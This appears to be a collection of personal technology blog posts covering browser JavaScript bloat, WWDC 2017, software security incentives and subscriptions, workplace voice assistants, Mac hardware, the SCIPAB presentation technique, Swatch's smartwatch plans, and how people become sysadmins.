The Enemy Within The Browser

At what point do the downsides of Javascript in the browser exceed the upsides? Have we already passed that point?

If you have any concept of security, the idea of downloading code from the Internet and immediately executing it, sight unseen, on your local machine, should give you the screaming heebie-jeebies. A lot of work has gone into sandboxing the browser processes so that Javascript cannot escape the browser itself, and later, the individual web page that it came from. However, this only dealt with the immediate and obvious vulnerability.

These days, the problem with Javascript is that it is used to track users all over the internet and serve them ads for the same products on every site. Quite why this requires 14 MB and 330 HTTP requests for 537 words is not entirely clear.

Actually, no, it is entirely clear: it is because the copro-grammers ("writers of feces") who produce this stuff have no respect for the users. The same utter disrespect underlies the recent bloat in iOS apps:

One Friday I turned off auto-update for apps and let the update queue build up for a week. The results shocked me.
After the first week I had 7.59GB of updates to install, spread across 67 apps – averaging 113MB per app.

Okay, so maybe you say who cares, you only update apps over wifi - but do you only browse on wifi? 14 MB for a few hundred words - that adds up fast.

And what else is that Javascript up to, beyond wasting bytes - both over the air, and in local storage?

How about snaflling data entered into a form, regardless of whether it has been submitted?

Using Javascript, those sites were transmitting information from people as soon as they typed or auto-filled it into an online form. That way, the company would have it even if those people immediately changed their minds and closed the page.

My house, my rules. I look forward to iOS 11, and enabling every blocking feature I can.

I really want media sites to earn money so that they can continue to exist, but they cannot do it at my expense. A banner ad is fine, but 14 MB of Javascript to serve me the same banner ad everywhere - at my expense! - is beyond the pale.

Javascript delenda est.

Thoughts about WWDC '17

First of all, let’s get the elephant in the room out of the way; no new iPhone was announced. I was not necessarily expecting one to show up - that seems more suited to a September event, unless there were specific iOS features that were enabled by new hardware and that developers needed to know about.

We did get a whole ton of new features for iOS 11 (it goes up to eleven!), but many of them were aimed squarely at the iPad. With no new iPhone, the iPad got most of the new product glory, sharing only with the iMac Pro and the HomePod (awful name, by the way).

On that note, some people were confused by the iMac Pro, but Apple has helpfully clarified that there is also going to be a Mac Pro and external displays to go with it:

In addition to the new iMac Pro, Apple is working on a completely redesigned, next-generation Mac Pro architected for pro customers who need the highest-end, high-throughput system in a modular design, as well as a new high-end pro display.

I doubt I will ever buy a desktop Mac again, except possibly if Apple ever updates the Mac mini, so this is all kind of academic for me - although I really hope the dark-coloured wireless extended keyboard from the iMac Pro will also be available for standalone purchase.

What I am really excited about is the new 10.5" iPad Pro and the attendant features in iOS 111. The 12.9" is too big for my use case (lots of travel), and the 9.7" Pro always looked like a placeholder device to me. Now we have a full lineup, with the 9.7" non-Pro iPad significantly different from the 10.5" iPad Pro, and the 12.9" iPad Pro there for people who really need the larger size - or maybe just don’t travel with their iPad quite as much as I do.

My current iPad (an Air 2) is my main personal device apart from my iPhone. The MacBook Pro is my work device, and opening it up puts me in "work mode", which is not always a good thing. On the iPad, I do a ton of reading, but I also create a fair amount of content. The on-screen keyboard and various third-party soft-tip styluses (styli?) work fine, but they’re not ideal, and so I have lusted after an iPad Pro for a while now. However, between the lack of sufficient hardware differentiation compared to what I have2, and lack of software support for productivity, I never felt compelled to take the plunge.

Now, I can’t wait to get my hands on an iPad Pro 10.5".

I already use features like the sidebar and side-by-side multitasking, but what iOS 11 brings is an order of magnitude beyond - especially with the ability to drag & drop between applications. Right now, while I may build an outline of a document on my iPad, I rarely do the whole thing there, because it is just so painful to do any complex work involving multiple switches between applications - so I end up doing all of that on my Mac.

The problem is that there is a friction in working with a Mac; I need (or feel that I need) longer stretches of time and more work-like environments to pull out my Mac. That friction is completely absent with an iPad; I am perfectly happy to get it out if I have more than a minute or so to myself, and there is plenty of room to work on an iPad in settings (such as, to pick an example at random, an economy seat on a short-haul flight) where there is simply no room to type on a Mac.

The new Files app also looks very promising. Sure, you can sort of do everything it does in a combination of iCloud Drive, Dropbox, and Google Drive, and I do - but I always find myself hunting around for the latest revision, and then turning to the share sheet to get whatever I need to where I can actually work on it.

With iOS 11, it looks like the iPad will truly start delivering on its promise as (all together now) a creation device, not just a consumption device.

Ask me again six months from now…

And if you want more exhaustive analysis, Federico Viticci has you covered.


  1. Yes, there was also some talk about the Watch, but since I gave up on fitness tracking, I can't really see the point in that whole product line. That's not to say that it has no value, just that I don't see the value to me. It certainly seems to be the smartwatch to get if you want to get a smartwatch, but the problem with that proposition is that I don't particularly want any smartwatch. 

  2. To me this is the explanation for the 13 straight quarters of iPad sales drop: an older iPad is still a very capable device, and outside of very specific use cases, or people upgrading from something like an iPad 2 or 3, there hasn’t been a compelling reason to upgrade - yet. For me at least, that compelling reason has arrived, with the combination of 10.5" iPad Pro and iOS 11. After the holiday quarter, I suppose we will find out how many people feel the same way. 

Incentives Drive Behaviour - Security Is No Exception

Why is security so hard?

Since I no longer work in security, I don’t have to worry about looking like an ambulance-chasing sales person, and I can opine freely about the state of the world.

The main problem with security is the intersection of complexity and openness. In the early days of computers there was a philosophical debate about the appropriate level of security to include in system design. The apex of openness was probably MIT’s Incompatible Time-Sharing System, which did not even oblige users to log on - although it was considered polite to do so.

I will just pause here to imagine that ethos of openness in the context of today’s social media, where the situation is so bad that Twitter felt obliged to change its default user icon because the “egg" had become synonymous with bad behaviour online.

By definition, security and openness are always in opposition. Gene "Spaf" Spafford, who knows a thing or two about security, famously opined that:

The only truly secure system is one that is powered off, cast in a block of concrete and sealed in a lead-lined room with armed guards - and even then I have my doubts.

Obviously, such a highly-secure system is not very usable, so people come up with various compromises based on their personal trade-off between security and usability. The problem is that this attempt to mediate between two opposite impulses adds complexity to the system, which brings its own security vulnerabilities.

Ultimately, IT security is a constant Red Queen’s Race, with operators of IT systems rushing to patch the latest flaws, knowing all the while that more flaws are lurking behind those, or being introduced with new functionality.

Every so often, maintainers of a system will just throw up their hands, declare a system officially unmaintainable, and move to something else. This process is called "End of Life", and is supposed to coincide with users also moving to the new supported platform.

Unfortunately this mass upgrade does not always take place. Many will cite compatibility as a justification, and certainly any IT technician worth their salt knows better than to mess with a running system without a good reason. More often, though, the reason is cost. In a spreadsheet used to calculate the return on different proposed investments, “security" falls under the heading of "risk avoidance"; a nebulous event in the future, that may become less probable if the investment is made.

For those who have not dealt with many finance people, as a rule, they hate this sort of thing. Unless you have good figures for both the probability of the future event and its impact, they are going to be very unhappy with any proposed investment on that basis.

The result is that old software sticks around long after it should have been retired.

As recently as November 2015, it emerged that Paris’ Orly airport was still operating on Windows 3.1 - an operating system that has not been supported since 2001.

The US military still uses 8" floppy disks for its ICBMs:

"This system remains in use because, in short, it still works," Pentagon spokeswoman Lt Col Valerie Henderson told the AFP news agency.

And of course we are still dealing with the fallout from the recent WannaCry ransomware worm, targeting Windows XP - an operating system that has not been supported since 2014. Despite that, it is still the fourth most popular version of Windows (behind Windows 7, Windows 10, and Windows 8.1), with 5.26% share.

Get to the Point!

It’s easy to mock people still using Windows XP, and to say that they got no more than they deserved - but look at that quote from the Pentagon again:

"This system remains in use because, in short, it still works"

Windows XP still works fine for its users. It is still fit for purpose. The IT industry has failed to give those people a meaningful reason to upgrade - and so many don’t, or wait until they buy new hardware and accept whatever comes with the new machine.

Those upgrades do not come nearly as frequently as they used to, though. In the late Nineties and early Oughts, I upgraded my PC every eighteen months or so (as funds permitted), because every upgrade brought huge, meaningful differences. Windows 95 really was a big step up from Windows 3.1. On the Mac side, System 7 really was much better than System 6. Moving from a 486 to a Pentium, or from 68k to PowerPC, was a massive leap. Adding a 3dfx card to your system made an enormous difference.

Vice-versa, a three-year-old computer was an unusable pile of junk. Nerds like me installed Linux on them and ran them side by side with our main computers, but most people had no interest in doing such things.

These days, that’s no longer the case. For everyday web browsing, light email, and word processing, a decade-old computer might well still cut it.

That’s not even to mention institutional use of XP; Britain’s NHS, for instance, was hit quite hard by WannaCry due to their use of Windows XP. For large organisations like the NHS, the direct financial cost of upgrading to a newer version of Windows is a relatively small portion of the overall cost of performing the upgrades, ensuring compatibility of all the required software, and retraining literally hundreds of thousands of staff.

So, users have weak incentives to upgrade to new, presumably more secure, versions of software; got it. Should vendors then be obliged to ship them security patches in perpetuity?

Zeynep Tufekci has argued as much in a piece for the New York Times:

First, companies like Microsoft should discard the idea that they can abandon people using older software. The money they made from these customers hasn’t expired; neither has their responsibility to fix defects.

Unfortunately, it’s not that simple, as Steven Bellovin explains:

There are two costs, a development cost $d and an annual support cost $s for n years after the "warranty" period. Obviously, the company pays $d and recoups it by charging for the product. Who should pay $n·s?

The trouble is that n can be large; the support costs could thus be unbounded.

Can we bound n? Two things are very clear. First, in complex software no one will ever find the last bug. As Fred Brooks noted many years ago, in a complex program patches introduce their own, new bugs. Second, achieving a significant improvement in a product's security generally requires a new architecture and a lot of changed code. It's not a patch, it's a new release. In other words, the most secure current version of Windows XP is better known as Windows 10. You cannot patch your way to security.

Incentives matter, on the vendor side as well as on the user side. Microsoft is not incentivised to do further work on Windows XP, because it has already gathered all the revenue it is ever going to get from that product. From a narrowly financial perspective, Microsoft would prefer that everyone purchase a new license for Windows 10, either standalone or bundled with the purchase of new hardware, and migrate to that platform.

Note that, as Steven Bellovin points out above, this is not just price-gouging; there are legitimate technical reasons to want users to move to the latest version of your product. However, financial incentives do matter, a lot.

This is why if you care about security, you should prefer services that come with a subscription.

If you’re not Paying, you’re the Product

Subscription licensing means that users pay a recurring fee, and in return, vendors provide regular updates, including both new features and fixes such as security patches.

As usual, Ben Thompson has a good primer on the difference between one-off and subscription pricing. His point is that subscriptions are better for both users and vendors because they align incentives correctly.

From a vendor’s perspective, one-off purchases give a hit of revenue up front, but do not really incentivise long-term engagement. It is true that in the professional and enterprise software world, there is also an ongoing maintenance charge, typically on the order of 18-20% per year. However, that is generally accounted for differently from sales revenue, and so does not drive behaviour to nearly the same extent. In this model, individual sales people have to behave like sharks, always in motion, always looking for new customers. Support for existing customers is a much lower priority.

Vice versa, with a subscription there is a strong incentive for vendors to persuade customers to renew their subscription - including by continuing to provide new features and patches. Subscription renewal rates are scrutinised carefully by management (and investors), as any failure to renew may well be symptomatic of problems.

Users are also incentivised to take advantage of the new features, since they have already paid for them. When upgrades are freely available, they are far more likely to be adopted - compare the adoption rate for new MacOS or iOS versions to the rate for Windows (where upgrades cost money) or Android (where upgrades might not be available, short of purchasing new hardware).

This is why Gartner expects that by 2020, more than 80 percent of software vendors will change their business model from traditional license and maintenance to subscription.

At Work - and at Home, Too

One final point: this is not just an abstract discussion for multi-million-euro enterprise license agreements. The exact same incentives apply at home.

A few years ago, I bought a cordless phone that also communicated with Skype. From the phone handset, I could make or answer either a POTS call, or a Skype voice call. This was great - for a while. Unfortunately the hardware vendor never upgraded the phone’s drivers for a new operating system version, which I had upgraded to for various reasons, including improved security.

For a while I soldiered on, using various hacks to keep my Skype phone working, but when the rechargeable batteries died, I threw the whole thing in the recycling bin and got a new, simpler cordless phone that did not depend on complicated software support.

A cordless phone is simple and inexpensive to replace. Imagine that had been my entire Home of the Future IoT setup, with doorbells, locks, alarms, thermostats, fridges, ovens, and who knows what else. “Sorry, your home is no longer supported."1

With a subscription, there is a reasonable expectation that vendors will continue to provide support for the reasonable lifetime of their products (and if they don’t, there is a contract with the force of law behind it).

Whether it’s for your home or your business, if you rely on it, make sure that you pay for a subscription, so that you can be assured of support from the vendor.


  1. Smart home support: “Have you tried closing all the windows and then reopening them one by one?" 

It Has Come To This

Dear websites that force mobile versions even when I explicitly request the desktop site: please do not hesitate to FOAD. Extra points for losing my context when you do.



Talk Softly

With the advent of always-on devices that are equipped with sensitive microphones and a permanent connection to the Internet, new security concerns are emerging.

Virtual assistants like Apple’s Siri, Microsoft’s Cortana and Google Now have the potential to make enterprise workers more productive. But do “always listening" assistants pose a serious threat to security and privacy, too?

Betteridge’s Law is in effect here. Sure enough, the second paragraph of the article discloses its sources:

Nineteen percent of organizations are already using intelligent digital assistants, such as Siri and Cortana, for work-related tasks, according to Spiceworks’ October 2016 survey of 566 IT professionals in North America, Europe, the Middle East and Africa.

A whole 566 respondents, you say? From a survey run by a help desk software company? One suspects that the article is over-reaching a bit - and indeed, if we click through to the actual survey, we find this:

Intelligent assistants (e.g., Cortana, Siri, Alexa) used for work-related tasks on company-owned devices had the highest usage rate (19%) of AI technologies

That is a little bit different from what the CSO Online article is claiming. Basically, anyone with a company-issued iPhone who has ever used Siri to create an appointment, set a reminder, or send a message about anything work-related would fall into this category.

Instead, the article makes the leap from that limited claim to extrapolating that people will be bringing their Alexa device to work and connecting it to the corporate network. Leaving aside for a moment the particular vision of hell that is an open-plan office where everyone is talking into the air all the time, what does that mean for the specific recommendations in the article?

  1. Focus on user privacy
  2. Develop a policy
  3. Treat virtual assistant devices like any IoT device
  4. Decide on BYO or company-owned
  5. Plan to protect

These are actually not bad recommendations - but they are so generic as to be useless. Worse, when they do get into specifics, they are almost laughably paranoid:

Assume all devices with a microphone are always listening. Even if the device has a button to turn off the microphone, if it has a power source it’s still possible it could be recording audio.

This is drug-dealer level of paranoia. Worrying that Alexa might be broadcasting your super secret and valuable office conversations does not even make the top ten list of concerns companies should have about introducing such devices into their networks.

The most serious threat you can get from Siri at work is co-workers pranking you if you enable access from the lock screen. In that case, anyone can grab your unattended iPhone and instruct Siri to call you by some ridiculous name. Of course I would never sabotage a colleague’s phone by renaming him “Sweet Cakes". Ahem. Interestingly, it turns out that the hypothetical renaming also extends to the entry in the Contacts…

The real concern is that by focusing on these misguided recommendations, the focus is taken off advice that would actually be useful in the real world. For instance, if you must have IoT devices in the office for some reason, this is good advice:

One way to segment IoT devices from the corporate network is to connect them to a guest Wi-Fi network, which doesn’t provide access to internal network resources.

This recommendation applies to any device that needs Internet access but does not require access to resources on the internal network. This will avoid issues where, by compromising a device (or its enabling cloud service), intruders are able access your internal network in what is known as a “traversal attack". If administrators restrict the device’s access to the network, that will also restrict the amount of damage an intruder can do.

Thinking about access to data is a good idea in general, not just for voice assistants or IoT devices:

Since personal virtual assistants “rely on the cloud to comprehend complex commands, fetch data or assign complex computing tasks to more resources," their use in the enterprise raises issues about data ownership, data retention, data and IP theft, and data privacy enforcement that CISOs and CIOs will need to address.

Any time companies choose to adopt a service that relies on the cloud, their attack surface is not limited to the device itself, but also extends to that back-end service - which is almost certainly outside their visibility and control. Worse, in a BYOD scenario, users may introduce new devices and services to the corporate network that are not designed or configured for compliance with organisations’ security and privacy rules.

Security is important - but let’s focus on getting the basics right, without getting distracted by overly-specific cybersecurity fantasy role-playing game scenarios involving Jason Bourne hacking your Alexa to steal your secrets.

A New Law

I was hanging out on LinkedIn, and I happened to notice a new pop-up, offering to help me boost my professional image with new photo filters.

My professional image may well need all sorts of help, but I do wonder whether this feature was the most productive use of LinkedIn’s R&D time.

Maybe this is the twenty-first century version of Zawinski's Law:

Every social networking app attempts to expand until it has photo filters. Those apps which cannot so expand are replaced by ones which can.

(I did not use the filters.)

New Mac Fever

Apple bloggers are all very excited about the announcement of a new Mac Pro. The best roundup I have seen is on Daring Fireball: The Mac Pro Lives.

I'm not a Mac Pro user, nor frankly am I ever likely to be. My tastes lie more at the other end of the spectrum, with the ultra-portable MacBook (aka MacBook Adorable). However, there was one interesting tidbit for me in the Daring Fireball report:

Near the end, John Paczkowski had the presence of mind to ask about the Mac Mini, which hadn’t been mentioned at all until that point. Schiller: “On that I’ll say the Mac Mini is an important product in our lineup and we weren’t bringing it up because it’s more of a mix of consumer with some pro use. … The Mac Mini remains a product in our lineup, but nothing more to say about it today."

While there are certainly Mac Mini users who choose it as the cheapest Mac, and perhaps as a way to keep using a monitor and other peripherals that used to be plugged into a PC, there is a substantial contingent of Mac Mini "pro" users. Without getting into Macminicolo levels of pro-ness, I run mine headless in a cupboard, where it serves iTunes and runs a few other services. It's cheap, quiet, and reliable, which makes it ideal for that role. I don't necessarily need ultimate power - average utilisation is extremely low, although there is the odd peak - but I do want to be reassured that this is a product line that will stick around, just in case my current Mac Mini breaks.

The most important Macs are obviously the MacBook and MacBook Pros, but it's good to know that Apple recognises a role for the Mac Pro - and for the Mac Mini.

Let Me Tell You A Story

Any good presentation is a story, and a good presenter is adept at telling their audience a story in a way that is compelling. Some are naturally good at this sort of thing - but all of us have been forced to sit through presentations with no unifying thread of story.

Luckily for the rest of us, there are techniques that can help us become better storytellers, and avoid boring our audiences to tears.

One of the most effective techniques I have learned is called SCIPAB, a technique developed by Steve Mandel and now spread by the company he founded, Mandel Communications. I was lucky enough to be trained in SCIPAB by Mandel Communications as part of a more general "presentation skills" training. I don’t want to steal their thunder (or their business!), but I do want to share some of the insights that I carry with me and use regularly.

SCIPAB is an acronym, which stands for the phases of a story:

  • Situation
  • Complication
  • Implication
  • Proposal1
  • Action
  • Benefit

These phases have a specific technical meaning within the Mandel technique, but they also align with the phases of another framing device, Joseph Campbell’s Hero’s Journey. There are seventeen phases to the Journey, which Steve Mandel wisely condensed to six for his audience of sales people and marketers. To quote Wikipedia:

In the Departure part of the narrative, the hero or protagonist lives in the ordinary world and receives a call to go on an adventure. The hero is reluctant to follow the call, but is helped by a mentor figure.

The Initiation section begins with the hero then traversing the threshold to the unknown or "special world", where he faces tasks or trials, either alone or with the assistance of helpers.

The hero eventually reaches "the innermost cave" or the central crisis of his adventure, where he must undergo "the ordeal" where he overcomes the main obstacle or enemy, undergoing "apotheosis" and gaining his reward (a treasure or "elixir").

The hero must then return to the ordinary world with his reward. He may be pursued by the guardians of the special world, or he may be reluctant to return, and may be rescued or forced to return by intervention from the outside.

In the Return section, the hero again traverses the threshold between the worlds, returning to the ordinary world with the treasure or elixir he gained, which he may now use for the benefit of his fellow man. The hero himself is transformed by the adventure and gains wisdom or spiritual power over both worlds.

Let us map SCIPAB onto the Hero’s Journey, so that we can take our audiences on a journey with us and lead them to a shared conclusion.

Situation

The S, Situation, is the status quo at the beginning of the story, where our audience is living today. In most heroic stories, this is some kind of idyll, but actually in most presentations, this part is present as an opportunity to confirm our understanding of our audience’s… well, Situation. In a general audience, this is to level-set that we all understand the main forces and trends affecting our industry or sector. In a more specific audience, this is our opportunity to confirm our understanding of their specific context, and to trot out all the homework that we have been doing on them. (You have been doing your homework on your audience, right?) If this phase goes well, we have successfully positioned ourselves as the right mentor to lead our audience on a the journey.

Complication

The C, Complication, is where we depart from the comfortable status quo. In this section, we are pointing out the trials and tribulations that are the consequence of the Situation. This is where we start to turn up the heat a little and say things that may be uncomfortable for the audience, pointing out ways in which the status quo is problematic or unsatisfactory. This often boils down to “that was a great plan, until these changes occurred, which made it no longer such a good fit".

Implication

The I, Implication, is the nadir, the lowest point of the emotional journey. Here we describe the ordeal that is inevitable if the Complication is not addressed, the "innermost cave" of the Hero's Journey. This phase is specifically about the bad things that can happen: toil and trouble, with the ultimate possibility of failure in the background. At this point the audience should be deeply uncomfortable, facing unpleasant truths about the long-term consequences of staying on their current trajectory.

Proposal

Having brought the audience to this low point, we give them a vision of what is possible. The P, Proposal, is where we describe a different outcome, the "treasure or elixir" that our audience might win by confronting the monster that we described in the previous steps. Here we are selling a shining vision of a possible future - one that is accessible if only the Situation can be confronted in the right way, avoiding the Complications and their Implications.

This emotional alternation between high and low is very important. In a longer presentation (or blog post or white paper or any other kind of story, for that matter) you can even repeat this alternation multiple times, taking the audience with you on an emotional roller coaster ride. Too much doom & gloom in one dose, and you’ll start to lose them - not just because it makes for a depressing presentation, but also because you end up talking down their current situation. No matter how bad they might accept intellectually that things are, having someone else poke at the sore points over and over (and over) will trigger a negative emotional reaction sooner or later. Don’t call other people’s babies ugly - at least, no more than is strictly necessary!

Action

Because this is ultimately a storytelling methodology in service of a sales effort, the key is to include concrete requests and actions that the audience should take. This the A of SCIPAB: specific Actions that you want to happen as a consequence of the story you have told. This could be a next-step workshop where you can go deeper into specifics of your Proposal, an opportunity to present to someone higher up the org chart, or a request for the audience to do something, such as download an evaluation version of your tool - but the key to ensuring progress and maintaining momentum is to ask for something at every step.

Benefit

Finally, close on the B, Benefits. This is part of that emotional roller-coaster, and also aligns to the Hero’s Journey. This is where the prospective customer gets concrete about the "treasure or elixir" they can gain from our Proposal - not to mention the "wisdom or spiritual power" they will gain along the way. This is to the Proposal what the Implication is to the Situation: the consequences that we can reasonably expect, given that starting point.

Above all, don’t be boring

By structuring your communications in this way, you will be able to have much more explicit and productive conversations with prospective customers - and at the very least, you won’t be boring them or inducing Death By Powerpoint.

Plus, this way is much more fun for the presenter. Try it, and let me know how it goes!


  1. This is also known as “Position", but “Proposal" is what I learned, plus I think it fits better within the flow. 

Smart Swatch

Remember Swatch? The must-have colourful plastic watches of the 80s and 90s? They are back in the news, with their new plan to produce their own smartwatch operating system.

Swatch plans to develop its own operating system as the Swiss watchmaker seeks to combine smart technology with the country’s expertise in making timepieces and miniaturisation, chief executive Nick Hayek has said.

Mr Hayek added that he wanted to avoid relying on Apple’s iOS and Google’s Android and provide a “Swiss" alternative offering stronger data protection and ultra-low energy consumption.

This new plan has caused all sorts of consternation around the Internet, but I was disposed to ignore it - until now. I just received this week's Monday Note, by the usually reliable Jean-Louis Gassée.

M. Gassée makes some initially good points about the complexity of operating systems, the immaturity of the smartwatch market, and the short timescales involved. Swatch intends to ship actual products by the end of 2018, which is barely any time at all when it comes to developing and shipping an entirely new physical product at mass-market scale. However, I do wonder whether he is falling into the same trap that he accuses Hayek and Swatch of falling into.

… in 2013, Hayek fils publicly pooh-poohed smart watches:
"Personally, I don’t believe it’s the next revolution… Replacing an iPhone with an interactive terminal on your wrist is difficult. You can’t have an immense display."

I tend to agree with Hayek, as it happens; the "terminal on the wrist" is pretty much a side show. The one stand-out use case for smart watches1 right now appears to be sensors and fitness. If that's not compelling, then there is very little else to attract you to smartwatches, even if you are a committed technophile like me. For myself, after wearing a Jawbone Up! for a year or two, I determined that I was not making use of the data that were gathered. The activity co-processor in my iPhone is ample for my limited needs.

What Is A Smartwatch?

The key point, however, is that Swatch have not announced an actual smart watch, but rather "an ecosystem for connected objects". M. Gassée even calls out some previous IoT form within CSEM, Swatch's partner in this venture, which recently produced the world's smallest Bluetooth chip.

The case against the wisdom of the Swatch project - the complexity of OS development and maintenance, the need for a developer ecosystem, and so on - assumes that Swatch are contemplating a direct rival for Apple's watchOS and Google Gear. What if that's not what's going on at all?

What if Swatch is going back to its roots, and making something simple and undemanding, but with the potential to be ubiquitous? The ecosystem for a smartwatch is now widespread: everyone has a smartphone, NFC is everywhere, from payment terminals to subway turnstiles. What if Swatch just intends to piggyback on that by embedding a few small and cheap sensors in its watches, without even having a screen at all?

Now that would be a Swatch move. In fact, it's such a Swatch move that they've done it before, with their Snow Pass line:

Its ski watch stores ski pass information and has an antenna that communicates with a scanner at the fast-track ski lift entrance. One swipe of the wrist and you're through.

That description sounds a lot like ApplePay to me - or really any NFC system. Add some pretty basic sensors, and you've got 80% of the smartwatch functionality that people actually use for 20% of the price.

Seen through this lens, the focus on privacy and security makes sense. It has been said that "the S in IoT stands for 'security'", and we could certainly all use an IoT player that focuses on that missing S. If the sensors themselves are small and simple enough, they would not need frequent updates and patches, as there would be nothing to exploit. The companion smartphone app would be the brains of the operation and gateway to all the data gathered, and could be updated as frequently as necessary, without needing to touch the sensors on the watch.

So What Is Swatch Really Up To?

As to why Swatch would even be interested in entering into such a project, remember that these days Swatch is part of a group that sprawls across 70 different brands, most far more up-scale (albeit less profitable) than lowly Swatch with its plastic watches. Think Omega, Breguet, Glashütte, Longines, or Blancpain. The major threat to those kinds of watches is not any single other watch; most watch lovers own several different mechanical watches, and choose one or another to wear for each day, activity, or occasion. In my own small way, I own three mechanical watches (and two quartz), for instance.

For a while now, and accelerating since the release of the iPhone, the competition for watches was - no watch at all. Why bother to wear a watch, the thinking went, when your smartphone can tell the time much more accurately? But now, insidiously, the competition is a watch again - but it is the last watch its owners will ever wear. Once you start really using an Apple Watch, you don't want to take it off, lest you miss out on all those activities being measured. Circles will go unfilled if you wear your Rolex to dinner.

But what if every watch you buy, at least from The Swatch Group, gives you the same measurements and can maintain continuity through the app on your phone? What if all of your watches can also let you on the subway, pay for your groceries, and so on? Other players such as Breitling and Montblanc have also been looking into this, but I think Swatch has a better chance, if only because they start from scale.

Now we are back to the comfortable (and profitable) status quo ante for the Swiss watch industry, in which watch aficionados own several different watches which they mix and match, but with each one part of the same connected experience.

Analogies are dangerous things. The last few years have conditioned us to watch out for the "PC guys are not just going to figure this out"-type statements from incumbents about to be disrupted. What if this time, the arrow points the other way? What if Swatch has finally figured out a way for the traditional watch industry to fight back against the ugly, unclassy interloper?


  1. In a further sign of the fact that this is still a developing market, even auto-correct appears to get confused between "smartwatch" and "smart watch". 

New Paths to Helicon

I was chatting to a friend last week, and we got onto the topic of where sysadmins come from. "When two sysadmins love each other very much…" - no, that doesn't bear thinking about. BRB, washing out my mind with bleach.

But seriously. There is no certification or degree that makes you a sysadmin. Most people come into the discipline by routes that are circuitous, sideways, if not entirely backwards. The one common factor is that most people scale up to it: they start running a handful of servers, move or grow to a 50-server shop, build out some tools and automation to help them get the job done, then upgrade to 500 servers, and so on.

The question my friend and I had was, what happens when there are no 10 and 50-server shops around? What happens when all the jobs that used to be done with on-premises servers are now done in SaaS or PaaS platforms? My own employer is already like that - we’re over a hundred people, and we are exactly the stereotypical startup that features in big infrastructure vendors' nightmares: a company that owns no physical compute infrastructure, beyond a clutch of stickered-up MacBooks, and runs everything in the cloud.

The 90s and Naughties, when I was cutting my teeth in IT, were a time when there was relative continuity between desktop and enterprise computing, but that is no longer the case. These days you’ve got to be pretty technical as a home user before anything you’re doing will be relevant at enterprise scale, because those in-between cases have mostly gone away. I got my start in IT working at the local Mac shop, but neighbourhood computer stores have gone the way of the dodo. There simply are not many chances to manage physical IT infrastructure any more.

Where Are Today’s On-Ramps?

There is one part of that early experience of mine which remains valid and replicable today. My first task was pure scut-work, transferring physical mail-in warranty cards into the in-house FileMaker Pro "database". After two weeks of this, I demanded (and received) permission to redo the UI, as it was a) making my eyes bleed, and b) frustrating me in my data entry. Once I’d fixed tab order and alignments, I got ambitious and started building out data-queries for auto-suggestions and cross-form validation and all sorts of other weird & wonderful functions to help me with the data entry. Pretty soon, I had just about automated myself out of that job; but in doing so, I had proven my value to the company, and received the traditional reward for a job well done - namely, another job.

That is today’s path into computing. People no longer have to edit autoexec.bat on their home computers just to play games, but on the other hand, they will start to mess around behind the scenes of their gaming forum or chat app, or later on, in Salesforce or ServiceNow or whatever. This is how they will develop an understanding of algorithms, and some of them will go on from there, gradually growing their skills and experience.

A Cloudy Future?

To be clear, this cloud-first world is not yet a reality - even at Moogsoft, only a fairly small percentage of our customer base opts for the SaaS deployment option. More use it for the pilot, though, and interest is picking up, even in unexpected quarters. On the other hand, these are big companies, often with tens or hundreds of thousands of servers. They have sunk costs that mean they lag behind the bleeding edge of the chance.

Even if someone does have 50 servers in an in-house server room today, as the hardware reaches its end-of-life date, more and more organisations are opting not to replace them. I was talking to someone who re-does offices, and a big part of the job is ripping out the in-house "data closet" to make more work space. The migration to the cloud is not complete, and won't be for some time, but it has definitely begun, even for existing companies.

What will save human jobs in this brave new world will be "intersection theory" - people finding their niches where different sub-fields and specialisations meet. Intuitive leaps and non-obvious connections between widely separated fields are what humans are good at. Those intersections will be one of the last bastions of the human jobs, augmented by automation of the more narrowly-focused and predictable parts of the job.

There will be other hold-outs too, notably tasks that are too niche for it to be worth the compute time to train up a neural network. My own story is somewhere in between the two, and would probably remain a viable on-ramp to IT - asssuming, of course, that there are still local firms big enough to need that kind of service.

Constant Change Is The Only Constant

To be clear, this is not me opining from atop an ivory tower. Making those unexpected, non-obvious connections, and doing so in a way that makes sense to humans, is the most precise definition I’d be willing to sign up to of the job I expect to have twenty years from now.

As we all continue to reinvent ourselves and our worlds, let's not forget to bring the next generations in. Thinking that being irreplaceable is an unalloyed win is a fallacy; if you can't be replaced, you also can't be promoted. We had to make it up as we went along, but now it's time to systematise what we learned along the way and get other people in to help us cover more ground.

See you out there.